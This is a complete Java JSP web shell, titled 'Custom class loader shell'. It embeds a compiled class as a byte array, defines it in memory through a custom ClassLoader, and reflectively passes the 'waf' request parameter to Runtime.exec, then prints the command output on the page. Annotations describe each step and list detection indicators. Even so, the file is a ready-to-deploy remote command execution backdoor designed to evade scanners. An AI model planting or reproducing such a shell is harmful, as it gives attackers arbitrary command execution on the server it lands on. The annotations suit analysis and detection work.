原理:先把命令执行类编码,然后使用自定义类加载器加载命令执行的类,进而调用方法
<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%>
<%@ page import="java.io.*" %>
<%@ page import="java.lang.reflect.Method" %>
<%@ page import="java.lang.reflect.InvocationTargetException" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<%!
// Binary name under which the embedded bytecode is registered by the loader
// below. defineClass requires it to match the class name recorded inside the
// bytes; the constant pool of testClassByte does carry "NeverGiveUp" (and the
// SourceFile entry "NeverGiveUp.java").
private static String testClassName = "NeverGiveUp";
// A complete Java class file stored as a signed-byte literal: -54,-2,-70,-66
// is the 0xCAFEBABE class-file magic and 0,0,0,52 is major version 52
// (the Java 8 class-file format). Reading the constant pool as ASCII shows
// what the class links against: java/lang/Runtime with getRuntime and
// exec(Ljava/lang/String;)Ljava/lang/Process;, Process.getInputStream,
// java/io/BufferedReader and InputStreamReader, the charset name "GBK"
// (presumably used to decode process output - not verified from the
// instruction stream), readLine, StringBuilder.append, a method
// ShowRuntime(Ljava/lang/String;)Ljava/lang/StringBuilder;, and the literal
// "Exec command error! By T00ls-12296-ximcx0101".
// Detection note: the magic as a signed-byte literal, those strings, and a
// defineClass call in the same JSP are stable indicators for this sample;
// the bytecode instructions themselves were not decoded here.
private static byte[] testClassByte = new byte[]{-54,-2,-70,-66,0,0,0,52,0,68,10,0,18,0,34,7,0,35,10,0,2,0,34,10,0,36,0,37,10,0,36,0,38,7,0,39,7,0,40,10,0,41,0,42,8,0,43,10,0,7,0,44,10,0,6,0,45,10,0,6,0,46,10,0,2,0,47,10,0,2,0,48,7,0,49,8,0,50,7,0,51,7,0,52,1,0,6,60,105,110,105,116,62,1,0,3,40,41,86,1,0,4,67,111,100,101,1,0,15,76,105,110,101,78,117,109,98,101,114,84,97,98,108,101,1,0,11,83,104,111,119,82,117,110,116,105,109,101,1,0,45,40,76,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,59,41,76,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,66,117,105,108,100,101,114,59,1,0,13,83,116,97,99,107,77,97,112,84,97,98,108,101,7,0,53,7,0,35,7,0,54,7,0,55,7,0,39,7,0,49,1,0,10,83,111,117,114,99,101,70,105,108,101,1,0,16,78,101,118,101,114,71,105,118,101,85,112,46,106,97,118,97,12,0,19,0,20,1,0,23,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,66,117,105,108,100,101,114,7,0,54,12,0,56,0,57,12,0,58,0,59,1,0,22,106,97,118,97,47,105,111,47,66,117,102,102,101,114,101,100,82,101,97,100,101,114,1,0,25,106,97,118,97,47,105,111,47,73,110,112,117,116,83,116,114,101,97,109,82,101,97,100,101,114,7,0,55,12,0,60,0,61,1,0,3,71,66,75,12,0,19,0,62,12,0,19,0,63,12,0,64,0,65,12,0,66,0,24,12,0,66,0,67,1,0,19,106,97,118,97,47,108,97,110,103,47,69,120,99,101,112,116,105,111,110,1,0,44,69,120,101,99,32,99,111,109,109,97,110,100,32,101,114,114,111,114,33,32,66,121,32,84,48,48,108,115,45,49,50,50,57,54,45,120,105,109,99,120,48,49,48,49,1,0,11,78,101,118,101,114,71,105,118,101,85,112,1,0,16,106,97,118,97,47,108,97,110,103,47,79,98,106,101,99,116,1,0,16,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,1,0,17,106,97,118,97,47,108,97,110,103,47,82,117,110,116,105,109,101,1,0,17,106,97,118,97,47,108,97,110,103,47,80,114,111,99,101,115,115,1,0,10,103,101,116,82,117,110,116,105,109,101,1,0,21,40,41,76,106,97,118,97,47,108,97,110,103,47,82,117,110,116,105,109,101,59,1,0,4,101,120,101,99,1,0,39,40,76,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,59,41,76
,106,97,118,97,47,108,97,110,103,47,80,114,111,99,101,115,115,59,1,0,14,103,101,116,73,110,112,117,116,83,116,114,101,97,109,1,0,23,40,41,76,106,97,118,97,47,105,111,47,73,110,112,117,116,83,116,114,101,97,109,59,1,0,42,40,76,106,97,118,97,47,105,111,47,73,110,112,117,116,83,116,114,101,97,109,59,76,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,59,41,86,1,0,19,40,76,106,97,118,97,47,105,111,47,82,101,97,100,101,114,59,41,86,1,0,8,114,101,97,100,76,105,110,101,1,0,20,40,41,76,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,59,1,0,6,97,112,112,101,110,100,1,0,28,40,67,41,76,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,66,117,105,108,100,101,114,59,0,33,0,17,0,18,0,0,0,0,0,2,0,1,0,19,0,20,0,1,0,21,0,0,0,29,0,1,0,1,0,0,0,5,42,-73,0,1,-79,0,0,0,1,0,22,0,0,0,6,0,1,0,0,0,4,0,9,0,23,0,24,0,1,0,21,0,0,0,-48,0,6,0,6,0,0,0,85,-69,0,2,89,-73,0,3,76,42,-58,0,74,-72,0,4,77,44,42,-74,0,5,78,-69,0,6,89,-69,0,7,89,45,-74,0,8,18,9,-73,0,10,-73,0,11,58,4,1,58,5,25,4,-74,0,12,89,58,5,-58,0,18,43,25,5,-74,0,13,16,10,-74,0,14,87,-89,-1,-23,43,-80,77,43,18,16,-74,0,13,-80,1,-80,0,1,0,12,0,74,0,75,0,15,0,2,0,22,0,0,0,46,0,11,0,0,0,6,0,8,0,7,0,12,0,9,0,16,0,10,0,22,0,11,0,44,0,12,0,47,0,13,0,73,0,14,0,75,0,15,0,76,0,16,0,83,0,19,0,25,0,0,0,45,0,4,-1,0,47,0,6,7,0,26,7,0,27,7,0,28,7,0,29,7,0,30,7,0,26,0,0,25,-1,0,1,0,2,7,0,26,7,0,27,0,1,7,0,31,7,0,1,0,32,0,0,0,2,0,33};
// ClassLoader subclass whose only special case is the class held in
// testClassByte: it is defined straight from the in-memory byte[] rather than
// located on the classpath, so no .class file is ever written to disk.
// Detection note: a ClassLoader subclass declared inside a JSP that calls
// defineClass on a literal byte array is itself a strong indicator; scanners
// that look for dropped .class files will not observe this class at all.
public static class MeClassLoder extends ClassLoader {
// Serves the embedded class when its name is requested; every other name is
// delegated to the parent loader as usual.
@Override
protected Class<?> findClass(String name) throws ClassNotFoundException {
if(name.equals(testClassName)){
// The single point where the embedded bytecode becomes a live Class; the
// name passed here must match the class name recorded inside the bytes.
return defineClass(testClassName,testClassByte,0,testClassByte.length);
}
return super.findClass(name);
}
// Loads the embedded class through a fresh loader, instantiates it and
// reflectively calls ShowRuntime(String) with the raw request parameter.
// The class's constant pool (readable from the signed bytes above) references
// java/lang/Runtime.getRuntime() and exec(String), so the "waf" argument is in
// practice the command line; the name implies no filtering and none is done
// here. Returns null when waf is null.
// Detection note: because the call goes through getMethod/invoke, the word
// "exec" never appears in this source; detection should key on defineClass
// plus getMethod/invoke fed from a request parameter rather than on exec.
public static StringBuilder Go(String waf) throws ClassNotFoundException, IllegalAccessException, InstantiationException, NoSuchMethodException, InvocationTargetException {
if(waf!=null){
MeClassLoder loder = new MeClassLoder();
Class<?> testclass = loder.loadClass(testClassName);
// Class.newInstance() (deprecated since Java 9); relies on the no-arg
// <init>()V that the embedded class declares in its constant pool.
Object testInstance =testclass.newInstance();
// The bytecode's descriptor for ShowRuntime is
// (Ljava/lang/String;)Ljava/lang/StringBuilder;, which is what the cast
// on the next line assumes.
Method method = testInstance.getClass().getMethod("ShowRuntime",String.class);
return (StringBuilder)method.invoke(testInstance,waf);
}
return null;
}
}
%>
<%String waf = request.getParameter("waf");
/* "waf" is the page's only input. It is passed unchanged to MeClassLoder.Go
   in the form below, and since the embedded class links against
   Runtime.exec(String), this parameter is in practice the command line.
   The parameter name presumably mimics a filter setting; nothing on this
   page validates or rewrites it. Detection note: a POST/GET to a JSP with
   this parameter, followed by a child process of the servlet container, is
   the observable footprint. */
StringBuilder result = new StringBuilder();
/* Placeholder value only: overwritten by Go(waf) below whenever waf is set. */
/* Go is static, so this instance merely serves as a call target; Go builds
   its own loader internally. */
MeClassLoder test = new MeClassLoder();%>
<html><head><title>Custom class loader shell</title><style type="text/css"> body.c10 {padding:0; margin: 0; height: 100%; background-color: #000;} div.c9 {background-color: #000; margin: 20px auto 0; padding: 20px 0; position: relative; width: 100%} table.c8 {width: 100%; border-collapse: collapse; color: #36cc5e;} td.c7 {text-align: center; border: 1px solid #999999; padding: 10px;} input.c6 { padding: 0 6px; height: 30px; border: 1px solid #b7b7b7; border-radius: 3px; width: 270px; color: #fff; background-color: #36cc5e; border-color: #36cc5e;} tr.c5 {text-align: center;} td.c4 { border: 1px solid #999999; padding: 10px;} input.c3 { height: 30px; width: 260px; padding: 4px 11px; color: rgba(0,0,0,.65); font-size: 14px; line-height: 1.5715; background-color: #fff; border: 1px solid #d9d9d9; border-radius: 2px;} td.c2 { text-align: center; border: 1px solid #999999; padding: 10px; position: relative;} h2.c1 {margin: 0; display: inline-block;}</style></head><body class="c10"><div class="c9"><form method="post" action="#"><table class="imagetable c8"><tr><td class="c2"><h2 class="c1">Custom class loader shell — By ximcx</h2></td></tr><tr class="c5"><td class="c4"><input name="waf" class="c3" type="text" value="<%=request.getParameter("waf") %>"></td></tr><tr><td class="c7"><input class="c6" type="submit" value="提交"></td></tr><tr><%/* The StringBuilder returned by Go is written verbatim inside <pre>;
   neither it nor the value= echo of the parameter above is HTML-escaped. */if(waf!=null){result = test.Go(waf);out.print("<td style=\"border: 1px solid #999999; padding: 0 0 0 35%;\"><pre>"+result+"</pre></td>");} %></tr></table></form></div></body></html>